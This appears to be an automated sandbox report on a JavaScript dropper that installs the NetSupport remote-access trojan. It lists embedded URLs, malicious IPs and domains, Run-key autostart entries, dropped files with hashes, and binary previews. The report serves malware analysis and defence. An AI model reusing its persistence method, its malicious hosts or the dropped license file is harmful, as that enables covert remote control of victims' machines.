                                                                                                    http://elasticloadbalancing.amazonaws.com/doc/2015-12-01/wscript.exe, 00000000.00000003.2000678439.000001AC45C31000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2002361612.000001AC45D9D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    		unknown
                                                                                                    https://github.com/d3/d3/blob/9cc9a875e636a1dcf36cc1e07bdf77e1ad6e2c74/src/layout/treemap.jswscript.exe, 00000000.00000003.1723178587.000001AC3F8B9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1722542431.000001AC3DA7B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      http://docs.aws.amazon.com/AmazonCloudFront/latest/DeveloperGuide/PrivateContent.htmlwscript.exe, 00000000.00000003.2000678439.000001AC46631000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        https://iam.amazonaws.com/doc/2010-05-08/wscript.exe, 00000000.00000003.2000678439.000001AC45C31000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2002361612.000001AC45D9D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          http://www.apache.org/licenses/LICENSE-2.0wscript.exe, 00000000.00000003.1722542431.000001AC3DA7B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            https://github.com/joyent/node/issues/1707wscript.exe, 00000000.00000003.2000678439.000001AC46631000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              http://cloudfront.amazonaws.com/doc/2017-10-30/wscript.exe, 00000000.00000003.2000678439.000001AC46631000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              		unknown
                                                                                                              http://elasticache.amazonaws.com/doc/2015-02-02/wscript.exe, 00000000.00000003.2000678439.000001AC45C31000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2002361612.000001AC45D9D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              		unknown
                                                                                                              https://sdk.amazonaws.com/js/BUNDLE_LICENSE.t(Ywscript.exe, 00000000.00000003.2000678439.000001AC46631000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                http://rds.amazonaws.com/doc/2013-02-12/wscript.exe, 00000000.00000003.2000678439.000001AC45C31000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2002361612.000001AC45D9D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  https://github.com/apache/echarts/issues/14266wscript.exe, 00000000.00000003.1722542431.000001AC3DA7B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    https://mathiasbynens.be/notes/javascript-encodingwscript.exe, 00000000.00000003.2000678439.000001AC46631000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      https://route53.amazonaws.com/doc/2013-04-01/wscript.exe, 00000000.00000003.2000678439.000001AC45C31000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        http://0.30000000000000004.com/wscript.exe, 00000000.00000003.1722542431.000001AC3DA7B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        • Avira URL Cloud: safe
                                                                                                                        		unknown
                                                                                                                        http://127.0.0.1client32.exefalse
                                                                                                                          		high
                                                                                                                          https://momentjs.com/wscript.exe, 00000000.00000003.1722542431.000001AC3DA7B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            https://developer.mozilla.org/en-US/docs/Web/API/CanvasRenderingContext2D/Variable1CompositeOperatiowscript.exe, 00000000.00000003.1723178587.000001AC3F8B9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1722542431.000001AC3DA7B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              http://tools.ietf.org/html/rfc3492#section-3.4wscript.exe, 00000000.00000003.2000678439.000001AC46631000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                https://sts.amazonaws.com/doc/2011-06-15/wscript.exe, 00000000.00000003.2000678439.000001AC46631000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  http://jsperf.com/call-apply-seguwscript.exe, 00000000.00000003.2000678439.000001AC46631000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                  		unknown
                                                                                                                                  https://blueimp.netwscript.exe, 00000000.00000003.2000678439.000001AC46631000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    http://cloudfront.amazonaws.com/doc/2019-03-26/wscript.exe, 00000000.00000003.2000678439.000001AC45C31000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                    		unknown
                                                                                                                                    https://depostsolo.biz/wscript.exe, 00000000.00000003.1995143786.000001AC3DFB3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    • Avira URL Cloud: malware
                                                                                                                                    		unknown
                                                                                                                                    https://bugs.chromium.org/p/v8/issues/detail?id=3175#c4wscript.exe, 00000000.00000003.2000678439.000001AC46631000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                    		unknown
                                                                                                                                    https://developer.mozilla.org/en-US/docs/Web/API/CanvasRenderingContext2D/globalCompositeOperationwscript.exe, 00000000.00000003.1723178587.000001AC3F8B9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1722542431.000001AC3DA7B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      http://ses.amazonaws.com/doc/2010-12-01/wscript.exe, 00000000.00000003.2000678439.000001AC45C31000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2002361612.000001AC45D9D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                      		unknown
                                                                                                                                      http://foo.comwscript.exe, 00000000.00000003.2000678439.000001AC46631000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        https://github.com/beatgammit/base64-js/issues/42wscript.exe, 00000000.00000003.2000678439.000001AC46631000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          http://ec2.amazonaws.com/doc/2016-11-15wscript.exe, 00000000.00000003.2000678439.000001AC45C31000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2002361612.000001AC45D9D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            http://elasticbeanstalk.amazonaws.com/docs/2010-12-01/wscript.exe, 00000000.00000003.2000678439.000001AC45C31000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2002361612.000001AC45D9D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                            		unknown
                                                                                                                                            http://docs.aws.amazon.com/amazondynamodb/latest/developerguide/DataModel.html)wscript.exe, 00000000.00000003.2000678439.000001AC46631000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              https://sdk.amazonaws.com/js/BUNDLE_LICENSE.txtwscript.exe, 00000000.00000003.2000678439.000001AC46631000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                		high
                                                                                                                                                http://autoscaling.amazonaws.com/doc/2011-01-01/wscript.exe, 00000000.00000003.2000678439.000001AC46631000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                		unknown
                                                                                                                                                https://github.com/ecomfe/zrender/blob/master/LICENSE.txtwscript.exe, 00000000.00000003.1722542431.000001AC3DA7B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  		high
                                                                                                                                                  http://feross.orgwscript.exe, 00000000.00000003.2000678439.000001AC46631000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    		high
                                                                                                                                                    https://sim.amazon.com/issues/ATHENA-39828wscript.exe, 00000000.00000003.2000678439.000001AC46631000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      		high
                                                                                                                                                      https://github.com/uuidjs/uuidwscript.exe, 00000000.00000003.2000678439.000001AC46631000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        		high
                                                                                                                                                        https://github.com/uuidjs/uuid#getrandomvalues-not-supportedwscript.exe, 00000000.00000003.2000678439.000001AC46631000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          		high
                                                                                                                                                          http://cloudfront.amazon(Ywscript.exe, 00000000.00000003.2000678439.000001AC46631000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                          		unknown

                                                                                                                                                          World Map of Contacted IPs

                                                                                                                                                          • No. of IPs < 25%
                                                                                                                                                          • 25% < No. of IPs < 50%
                                                                                                                                                          • 50% < No. of IPs < 75%
                                                                                                                                                          • 75% < No. of IPs

                                                                                                                                                          Public IPs

                                                                                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                          98.142.240.215
                                                                                                                                                          		businessinsanjose.infoCanada
                                                                                                                                                          		30407VELCOMCAtrue
                                                                                                                                                          194.180.191.64
                                                                                                                                                          		unknownunknown
                                                                                                                                                          		39798MIVOCLOUDMDtrue
                                                                                                                                                          104.26.0.231
                                                                                                                                                          		geo.netsupportsoftware.comUnited States
                                                                                                                                                          		13335CLOUDFLARENETUSfalse

                                                                                                                                                          General Information

                                                                                                                                                          Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                          Analysis ID:1576919
                                                                                                                                                          Start date and time:2024-12-17 18:11:23 +01:00
                                                                                                                                                          Joe Sandbox product:CloudBasic
                                                                                                                                                          Overall analysis duration:0h 9m 25s
                                                                                                                                                          Hypervisor based Inspection enabled:false
                                                                                                                                                          Report type:full
                                                                                                                                                          Cookbook file name:default.jbs
                                                                                                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                          Number of analysed new started processes analysed:8
                                                                                                                                                          Number of new started drivers analysed:0
                                                                                                                                                          Number of existing processes analysed:0
                                                                                                                                                          Number of existing drivers analysed:0
                                                                                                                                                          Number of injected processes analysed:0
                                                                                                                                                          Technologies:
                                                                                                                                                          • HCA enabled
                                                                                                                                                          • EGA enabled
                                                                                                                                                          • AMSI enabled
                                                                                                                                                          Analysis Mode:default
                                                                                                                                                          Analysis stop reason:Timeout
                                                                                                                                                          Sample name:5j0fix05fy.js
                                                                                                                                                          renamed because original name is a hash value
                                                                                                                                                          Original Sample Name:84bf3a782161537926aa8fd1061d852d33ebbf57889521c99e9b3c8b79f22571.js
                                                                                                                                                          Detection:MAL
                                                                                                                                                          Classification:mal100.rans.evad.winJS@5/21@3/3
                                                                                                                                                          EGA Information:
                                                                                                                                                          • Successful, ratio: 100%
                                                                                                                                                          HCA Information:
                                                                                                                                                          • Successful, ratio: 75%
                                                                                                                                                          • Number of executed functions: 129
                                                                                                                                                          • Number of non-executed functions: 222
                                                                                                                                                          Cookbook Comments:
                                                                                                                                                          • Found application associated with file extension: .js

                                                                                                                                                          Warnings

                                                                                                                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                                                                                          • Excluded IPs from analysis (whitelisted): 20.109.210.53, 13.107.246.63
                                                                                                                                                          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                          • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                                          • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                          • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                          • VT rate limit hit for: 5j0fix05fy.js

                                                                                                                                                          Simulations

                                                                                                                                                          Behavior and APIs

                                                                                                                                                          TimeTypeDescription
                                                                                                                                                          12:13:32API Interceptor2155700x Sleep call for process: client32.exe modified
                                                                                                                                                          17:12:56AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run C:\ProgramData\4dvs23l\client32.exe
                                                                                                                                                          17:13:05AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run C:\ProgramData\4dvs23l\client32.exe

                                                                                                                                                          Joe Sandbox View / Context

                                                                                                                                                          IPs

                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                          194.180.191.64Update.jsGet hashmaliciousNetSupport RATBrowse
                                                                                                                                                          • http://194.180.191.64/fakeurl.htm
                                                                                                                                                          104.26.0.231lFxGd66yDa.exeGet hashmaliciousNetSupport RATBrowse
                                                                                                                                                          • geo.netsupportsoftware.com/location/loca.asp
                                                                                                                                                          Jjv9ha2GKn.exeGet hashmaliciousNetSupport RAT, DarkTortillaBrowse
                                                                                                                                                          • geo.netsupportsoftware.com/location/loca.asp
                                                                                                                                                          file.exeGet hashmaliciousNetSupport RATBrowse
                                                                                                                                                          • geo.netsupportsoftware.com/location/loca.asp
                                                                                                                                                          Pyyidau.vbsGet hashmaliciousNetSupport RATBrowse
                                                                                                                                                          • geo.netsupportsoftware.com/location/loca.asp
                                                                                                                                                          file.exeGet hashmaliciousNetSupport RATBrowse
                                                                                                                                                          • geo.netsupportsoftware.com/location/loca.asp
                                                                                                                                                          file.exeGet hashmaliciousNetSupport RATBrowse
                                                                                                                                                          • geo.netsupportsoftware.com/location/loca.asp
                                                                                                                                                          KC0uZWwr8p.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                                                                                                                          • geo.netsupportsoftware.com/location/loca.asp
                                                                                                                                                          KC0uZWwr8p.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                                                                                                                          • geo.netsupportsoftware.com/location/loca.asp
                                                                                                                                                          hkpqXovZtS.exeGet hashmaliciousNetSupport RATBrowse
                                                                                                                                                          • geo.netsupportsoftware.com/location/loca.asp
                                                                                                                                                          file.exeGet hashmaliciousNetSupport RATBrowse
                                                                                                                                                          • geo.netsupportsoftware.com/location/loca.asp

                                                                                                                                                          Domains

                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                          geo.netsupportsoftware.comMerge.exeGet hashmaliciousNetSupport RATBrowse
                                                                                                                                                          • 104.26.1.231
                                                                                                                                                          lFxGd66yDa.exeGet hashmaliciousNetSupport RATBrowse
                                                                                                                                                          • 104.26.0.231
                                                                                                                                                          Jjv9ha2GKn.exeGet hashmaliciousNetSupport RAT, DarkTortillaBrowse
                                                                                                                                                          • 104.26.0.231
                                                                                                                                                          5q1Wm5VlqL.exeGet hashmaliciousNetSupport RATBrowse
                                                                                                                                                          • 104.26.1.231
                                                                                                                                                          Update.jsGet hashmaliciousNetSupport RATBrowse
                                                                                                                                                          • 104.26.1.231
                                                                                                                                                          file.exeGet hashmaliciousNetSupport RATBrowse
                                                                                                                                                          • 104.26.0.231
                                                                                                                                                          file.exeGet hashmaliciousNetSupport RATBrowse
                                                                                                                                                          • 104.26.1.231
                                                                                                                                                          Pyyidau.vbsGet hashmaliciousNetSupport RATBrowse
                                                                                                                                                          • 104.26.1.231
                                                                                                                                                          Pyyidau.vbsGet hashmaliciousNetSupport RATBrowse
                                                                                                                                                          • 104.26.0.231

                                                                                                                                                          ASNs

                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                          MIVOCLOUDMDUpdate.jsGet hashmaliciousNetSupport RATBrowse
                                                                                                                                                          • 194.180.191.64
                                                                                                                                                          eBHn6qHPLz.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                          • 5.181.159.153
                                                                                                                                                          eBHn6qHPLz.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                          • 5.181.159.153
                                                                                                                                                          I2BJhmJou4.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                          • 94.158.244.69
                                                                                                                                                          I5jG2Os8GA.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                          • 94.158.244.69
                                                                                                                                                          OlZzqwjrwO.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                          • 94.158.244.69
                                                                                                                                                          Vd3tOP5WSD.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                          • 94.158.244.69
                                                                                                                                                          g1kWKm20Z5.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                          • 94.158.244.69
                                                                                                                                                          cgln32y2HF.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                          • 94.158.244.69
                                                                                                                                                          4Oq9i3gm0g.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                          • 94.158.244.69
                                                                                                                                                          VELCOMCAhttp://dailyfragrancedeals.comGet hashmaliciousUnknownBrowse
                                                                                                                                                          • 98.142.240.167
                                                                                                                                                          na.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                          • 104.234.135.1
                                                                                                                                                          Copy60330548196.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                          • 98.142.254.109
                                                                                                                                                          Copy10330520PDF.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                          • 98.142.254.109
                                                                                                                                                          Copy10330520PDF.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                          • 98.142.254.109
                                                                                                                                                          Copy60330548196.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                          • 98.142.254.109
                                                                                                                                                          MGJBbT28p7.ps1Get hashmaliciousPureLog Stealer, XWormBrowse
                                                                                                                                                          • 104.234.204.76
                                                                                                                                                          670un9Ls5U.vbsGet hashmaliciousXWormBrowse
                                                                                                                                                          • 104.234.204.76
                                                                                                                                                          LCfvMBneAT.ps1Get hashmaliciousPureLog Stealer, XWormBrowse
                                                                                                                                                          • 104.234.204.76
                                                                                                                                                          NxyRj26Cuc.ps1Get hashmaliciousXWormBrowse
                                                                                                                                                          • 104.234.204.76
                                                                                                                                                          CLOUDFLARENETUSlavita.msiGet hashmaliciousBruteRatel, LatrodectusBrowse
                                                                                                                                                          • 172.67.161.60
                                                                                                                                                          https://escrowmedifllc.hostconstructionapp.com/qL3Zw/Get hashmaliciousUnknownBrowse
                                                                                                                                                          • 104.21.8.110
                                                                                                                                                          Doc_16-48-43.jsGet hashmaliciousUnknownBrowse
                                                                                                                                                          • 104.21.96.1
                                                                                                                                                          Doc_16-48-43.jsGet hashmaliciousUnknownBrowse
                                                                                                                                                          • 104.21.112.1
                                                                                                                                                          https://evitefestivities.infoGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                          • 104.17.25.14
                                                                                                                                                          http://escrowmedifllc.hostconstructionapp.comGet hashmaliciousUnknownBrowse
                                                                                                                                                          • 104.21.8.110
                                                                                                                                                          https://docs.google.com/presentation/d/e/2PACX-1vS4E-28RyhuHX8_MZcsg7wizgGkSwW0LDVl5HNjN-NsvlVsETQwbyEWxbBU714X4OECIwqCDQyWoANZ/pub?start=false&loop=false&delayms=3000Get hashmaliciousUnknownBrowse
                                                                                                                                                          • 104.17.25.14
                                                                                                                                                          https://cc.naver.com/cc?a=pst.link&m=1&nsc=Mblog.post&u=https://prestamosgarantizados.com/wvr/#svk8Lh6vLh6njx3lLh6vg4Pnq07qug4Plvk8Lh6rjx3z9BR15WPyGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                          • 1.1.1.1
                                                                                                                                                          https://tekascend.com/Get hashmaliciousCAPTCHA Scam ClickFixBrowse
                                                                                                                                                          • 104.16.124.96
                                                                                                                                                          http://ngfreemessage-verifying.freewebhostmost.com/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                          • 104.17.25.14

                                                                                                                                                          JA3 Fingerprints

                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                          37f463bf4616ecd445d4a1937da06e19Setup.msiGet hashmaliciousVidarBrowse
                                                                                                                                                          • 98.142.240.215
                                                                                                                                                          htkeUc1zJ0.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                          • 98.142.240.215
                                                                                                                                                          67618a47ee8c5.vbsGet hashmaliciousMint StealerBrowse
                                                                                                                                                          • 98.142.240.215
                                                                                                                                                          PKO_0019868519477_PDF_#U2462#U2465#U2461#U2465#U2467#U2464#U2464#U2466.htaGet hashmaliciousMint StealerBrowse
                                                                                                                                                          • 98.142.240.215
                                                                                                                                                          BBVA S.A..vbsGet hashmaliciousRemcosBrowse
                                                                                                                                                          • 98.142.240.215
                                                                                                                                                          ugpJX5h56S.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                          • 98.142.240.215
                                                                                                                                                          87h216Snb7.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                          • 98.142.240.215
                                                                                                                                                          dP5z8RpEyQ.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                                          • 98.142.240.215
                                                                                                                                                          hpEAJnNwCB.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                          • 98.142.240.215

                                                                                                                                                          Dropped Files

                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                          C:\ProgramData\4dvs23l\HTCTL32.DLLUpdate.jsGet hashmaliciousNetSupport RATBrowse
                                                                                                                                                            hkpqXovZtS.exeGet hashmaliciousNetSupport RATBrowse
                                                                                                                                                              Update.jsGet hashmaliciousNetSupport RATBrowse
                                                                                                                                                                update.jsGet hashmaliciousNetSupport RATBrowse
                                                                                                                                                                  Update.jsGet hashmaliciousNetSupport RATBrowse
                                                                                                                                                                    update.jsGet hashmaliciousNetSupport RATBrowse
                                                                                                                                                                      updates.jsGet hashmaliciousNetSupport RATBrowse
                                                                                                                                                                        updates.jsGet hashmaliciousNetSupport RATBrowse
                                                                                                                                                                          Update 124.0.6367.158.jsGet hashmaliciousNetSupport RATBrowse
                                                                                                                                                                            updates.jsGet hashmaliciousNetSupport RATBrowse

                                                                                                                                                                              Created / dropped Files

                                                                                                                                                                              C:\ProgramData\4dvs23l.zip

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Windows\System32\wscript.exe
                                                                                                                                                                              File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):2741435
                                                                                                                                                                              Entropy (8bit):7.997442816788816
                                                                                                                                                                              Encrypted:true
                                                                                                                                                                              SSDEEP:49152:ZZQdM9sL3HYZucbQlRsXwlKsaFnTT7Ejujwk/wGZ1f0ZjkJGwuPVuJREAED4T42u:TQdMeoocbQQXwlSTQju0k/wGvYk8wrRW
                                                                                                                                                                              MD5:2C83C4570B4773898A574E4143D11241
                                                                                                                                                                              SHA1:CD8632E7EDACE07CDDAB7D0B2BABECF12E58A102
                                                                                                                                                                              SHA-256:E0FF12DD4DBAD622CF4596EF3C00296E99D47AA8E038D32209323887FBA730DA
                                                                                                                                                                              SHA-512:75DDF226A14515D61A66E9C6C5E5535B0EA6F5C7510D5F8140B7DF7DAB5BEFA2CE2AAB240BC6E3663189DF8D22D860590950A4E39C1D2069294C0B15EA695BF7
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Preview:PK..........WW..%..m..........client32.exe.\w\TG.>K...D%&..)&.M._.E....D`.....P.$...k.h4&F.. .........{4.z....]X.\..?<..3w...>g..Y.9.m5......`/.b.../.a..CH.=.y.h...N.A..gN..).j.#.6mz.......i.A...u4.:.....@...F.i....*..b...t..S.v?...6...=...s.?;....~M..8[.."...4.Aq./P......Q%L........2.k..8.a..Y.....+..t..u'..........7...j3:..A[:..........!~sB.U.@xV..:..^.3}%!..."....j.gM_...f....zRa&.u...2......l..gJ.-..........c...gm...Q#8.$.8o.x4.sk.(Z..Kh.eCEC.<..z....%.@...-...j04W..y....V.k.i..~...:........bC..>......c.....f$..?.&Q..5......T.*g.[[:.......)..K..u..u...Me;.Ng.6.r%.(*.%.Q.V..Juey.j.i.8.fJ....?.....f...?..2..D.s.B....7k.......3.7t..p.4.)~....5.............Et.f...2:h.)..u..U.$qp..x}..>]>...".0v..v...l....J....>..S8...N..7.O2..E.......ai..{.z.......t.Jg#.{....|.......f...#TY..t.3k.IgM:...v..L..s....'.......lu..?u...g....O..A.(_....w...i..7q}B.....>...K......1M\.K.O}D.D.=..!..Q.N}..H.?......>tDu.....t.o..Nu..z...,.U.A......."`.FQ....

                                                                                                                                                                              C:\ProgramData\4dvs23l\HTCTL32.DLL

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Windows\System32\wscript.exe
                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):328056
                                                                                                                                                                              Entropy (8bit):6.7547459359511395
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:6144:Hib5YbsXPKXd6ppGpwpbGf30IVFpSzyaHx3/4aY5dUilQpAf84lH0JYBAnM1OKB:Hib5YbsXioEgULFpSzya9/lY5SilQCfR
                                                                                                                                                                              MD5:C94005D2DCD2A54E40510344E0BB9435
                                                                                                                                                                              SHA1:55B4A1620C5D0113811242C20BD9870A1E31D542
                                                                                                                                                                              SHA-256:3C072532BF7674D0C5154D4D22A9D9C0173530C0D00F69911CDBC2552175D899
                                                                                                                                                                              SHA-512:2E6F673864A54B1DCAD9532EF9B18A9C45C0844F1F53E699FADE2F41E43FA5CBC9B8E45E6F37B95F84CF6935A96FBA2950EE3E0E9542809FD288FEFBA34DDD6A
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Yara Hits:
                                                                                                                                                                              • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\ProgramData\4dvs23l\HTCTL32.DLL, Author: Joe Security
                                                                                                                                                                              Antivirus:
                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 13%
                                                                                                                                                                              Joe Sandbox View:
                                                                                                                                                                              • Filename: Update.js, Detection: malicious, Browse
                                                                                                                                                                              • Filename: hkpqXovZtS.exe, Detection: malicious, Browse
                                                                                                                                                                              • Filename: Update.js, Detection: malicious, Browse
                                                                                                                                                                              • Filename: update.js, Detection: malicious, Browse
                                                                                                                                                                              • Filename: Update.js, Detection: malicious, Browse
                                                                                                                                                                              • Filename: update.js, Detection: malicious, Browse
                                                                                                                                                                              • Filename: updates.js, Detection: malicious, Browse
                                                                                                                                                                              • Filename: updates.js, Detection: malicious, Browse
                                                                                                                                                                              • Filename: Update 124.0.6367.158.js, Detection: malicious, Browse
                                                                                                                                                                              • Filename: updates.js, Detection: malicious, Browse
                                                                                                                                                                              Reputation:moderate, very likely benign file
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ ...A...A...A.......A...9...A...A..gA....1..A....0.A.......A.......A.......A..Rich.A..........PE..L.....V...........!.................Z.......................................P......._....@......................... ...k....y..x.......@...............x).......0..................................._..@............................................text............................... ..`.rdata..............................@..@.data....f.......(...v..............@....rsrc...@...........................@..@.reloc..b1.......2..................@..B........................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                              C:\ProgramData\4dvs23l\NSM.LIC

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Windows\System32\wscript.exe
                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):195
                                                                                                                                                                              Entropy (8bit):4.924914741174998
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:6:O/oPITDKHMoEEjLgpVUK+Odfu2M0M+ZYpPM/iotqO2La8l6i7s:XAyJjjqVUKHdW2MdRPM/iotq08l6J
                                                                                                                                                                              MD5:E9609072DE9C29DC1963BE208948BA44
                                                                                                                                                                              SHA1:03BBE27D0D1BA651FF43363587D3D6D2E170060F
                                                                                                                                                                              SHA-256:DC6A52AD6D637EB407CC060E98DFEEDCCA1167E7F62688FB1C18580DD1D05747
                                                                                                                                                                              SHA-512:F0E26AA63B0C7F1B31074B9D6EEF88D0CFBC467F86B12205CB539A45B0352E77CE2F99F29BAEAB58960A197714E72289744143BA17975699D058FE75D978DFD0
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:moderate, very likely benign file
                                                                                                                                                                              Preview:1200..0x3ca968c5....[[Enforce]]....[_License]..control_only=0..expiry=01/01/2028..inactive=0..licensee=XMLCTL..maxslaves=9999..os2=1..product=10..serial_no=NSM303008..shrink_wrap=0..transport=0..

                                                                                                                                                                              C:\ProgramData\4dvs23l\NSM.ini

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Windows\System32\wscript.exe
                                                                                                                                                                              File Type:Generic INItialization configuration [Features]
                                                                                                                                                                              Category:dropped
